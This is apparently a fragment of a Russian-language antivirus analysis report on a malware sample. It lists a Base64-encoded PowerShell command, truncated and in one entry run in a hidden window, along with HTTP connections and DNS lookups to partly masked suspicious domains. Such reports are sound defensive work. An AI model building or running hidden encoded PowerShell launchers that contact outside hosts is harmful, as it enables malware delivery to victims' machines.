Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABiADYANgAzADAAMQA9ACcARABfADMANQA3ADEAOQA2ACcAOwAkAFYAOQA2ADAAMgAzADUANQAgAD0AIAAnADIANgA3ACcAOwAkAGwANQAzADcAMwBfAD0AJwBjADkAMwA2ADQAMwA4ADMAJwA7ACQAVAA1ADcANgA5ADkAPQAkAGUAbgB2ADoAdQBz...
- 'fi#####saltosaltos.com':80
- 'we#####hibitions.com':80
- DNS ASK el###mory.com
- DNS ASK ak##l.com
- DNS ASK ri####indianews.com
- DNS ASK fi#####saltosaltos.com
- DNS ASK we#####hibitions.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABiADYANgAzADAAMQA9ACcARABfADMANQA3ADEAOQA2ACcAOwAkAFYAOQA2ADAAMgAzADUANQAgAD0AIAAnADIANgA3ACcAOwAkAGwANQAzADcAMwBfAD0AJwBjADkAMwA2ADQAMwA4ADMAJwA7ACQAVAA1ADcANgA5ADkAPQAkAGUAbgB2ADoAdQBz...' (со скрытым окном)